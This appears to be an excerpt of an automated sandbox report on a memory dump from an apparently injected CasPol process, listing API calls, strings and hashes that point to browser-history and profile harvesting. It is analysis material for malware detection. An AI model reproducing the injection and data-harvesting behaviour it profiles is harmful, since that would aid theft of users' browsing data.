                                                                                                                                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                    • API String ID: 2787044678-1921111777
                                                                                                                                                                                    • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                    • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                    • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
• GetWindowRect.USER32(00000000,?), ref: 004142BC
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
• GetClientRect.USER32(?,?), ref: 004142E1
• GetWindowRect.USER32(?,?), ref: 004142EB
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
• GetClientRect.USER32(?,?), ref: 0041433B
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
• API String ID: 2080319088-3046471546
APIs
• EndDialog.USER32(?,?), ref: 00413221
• GetDlgItem.USER32(?,000003EA), ref: 00413239
• SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
• SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
• memset.MSVCRT ref: 00413292
• memset.MSVCRT ref: 004132B4
• memset.MSVCRT ref: 004132CD
• memset.MSVCRT ref: 004132E1
• memset.MSVCRT ref: 004132FB
• memset.MSVCRT ref: 00413310
• GetCurrentProcess.KERNEL32 ref: 00413318
• ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
• ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
• memset.MSVCRT ref: 004133C0
• GetCurrentProcessId.KERNEL32 ref: 004133CE
• memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
• wcscpy.MSVCRT ref: 0041341F
• _snwprintf.MSVCRT ref: 0041348E
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
• GetDlgItem.USER32(?,000003EA), ref: 004134B0
• SetFocus.USER32(00000000), ref: 004134B7
Strings
• {Unknown}, xrefs: 004132A6
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
• API String ID: 4111938811-1819279800
APIs
• GetDlgItem.USER32(?,000003EC), ref: 004011F0
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
• GetDlgItem.USER32(?,000003EE), ref: 00401238
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
• GetDlgItem.USER32(?,000003EC), ref: 00401273
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
• GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
• LoadCursorW.USER32(00000000,00000067), ref: 00401297
• SetCursor.USER32(00000000), ref: 0040129E
• GetDlgItem.USER32(?,000003EE), ref: 004012BF
• ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
• GetDlgItem.USER32(?,000003EC), ref: 004012E6
• SetBkMode.GDI32(?,00000001), ref: 004012F2
• SetTextColor.GDI32(?,00C00000), ref: 00401300
• GetSysColorBrush.USER32(0000000F), ref: 00401308
• GetDlgItem.USER32(?,000003EE), ref: 00401329
• EndDialog.USER32(?,?), ref: 0040135E
• DeleteObject.GDI32(?), ref: 0040136A
• GetDlgItem.USER32(?,000003ED), ref: 0040138F
• ShowWindow.USER32(00000000), ref: 00401398
• GetDlgItem.USER32(?,000003EE), ref: 004013A4
• ShowWindow.USER32(00000000), ref: 004013A7
• SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
• SetWindowTextW.USER32(?,00000000), ref: 004013CA
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
• SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
• String ID:
• API String ID: 829165378-0
APIs
• memset.MSVCRT ref: 00404172
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
• wcscpy.MSVCRT ref: 004041D6
• wcscpy.MSVCRT ref: 004041E7
• memset.MSVCRT ref: 00404200
• memset.MSVCRT ref: 00404215
• _snwprintf.MSVCRT ref: 0040422F
• wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 0040426E
• memset.MSVCRT ref: 004042CD
• memset.MSVCRT ref: 004042E2
• _snwprintf.MSVCRT ref: 004042FE
• wcscpy.MSVCRT ref: 00404311
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
• String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
• API String ID: 2454223109-1580313836
APIs
  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
• SetMenu.USER32(?,00000000), ref: 00411453
• SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
• GetModuleHandleW.KERNEL32(00000000), ref: 00411495
• LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
• GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
• CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
• memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
• ShowWindow.USER32(?,?), ref: 004115FE
• GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
• GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
• RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
• SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
• SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
• String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
• API String ID: 4054529287-3175352466
                                                                                                                                                                                    • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                    • API String ID: 3143752011-1996832678
                                                                                                                                                                                    • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                    • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                                                                                                    • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,000000FF,00000000,00000104), ref: 00413559
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver,?,000000FF,00000000,00000104), ref: 0041356B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver,?,000000FF,00000000,00000104), ref: 0041357D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,000000FF,00000000,00000104), ref: 0041358F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,000000FF,00000000,00000104), ref: 004135A1
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject,?,000000FF,00000000,00000104), ref: 004135B3
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess,?,000000FF,00000000,00000104), ref: 004135C5
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtResumeProcess,?,000000FF,00000000,00000104), ref: 004135D7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                    • API String ID: 667068680-2887671607
                                                                                                                                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                    • API String ID: 1607361635-601624466
                                                                                                                                                                                    • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                                                                                                    • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1043902810-0
                                                                                                                                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                    • free.MSVCRT ref: 0040E49A
                                                                                                                                                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                    • memset.MSVCRT ref: 0040E380
                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                                                                    • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                    • API String ID: 3849927982-2252543386
                                                                                                                                                                                    • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                    • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                    • API String ID: 2899246560-1542517562
                                                                                                                                                                                    • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                    • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                    • memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040933B
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00409411
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00409429
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                    • memcmp.MSVCRT ref: 004094AC
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3715365532-3916222277
                                                                                                                                                                                    • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                    • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                    • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                    • API String ID: 3330709923-517860148
                                                                                                                                                                                    • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
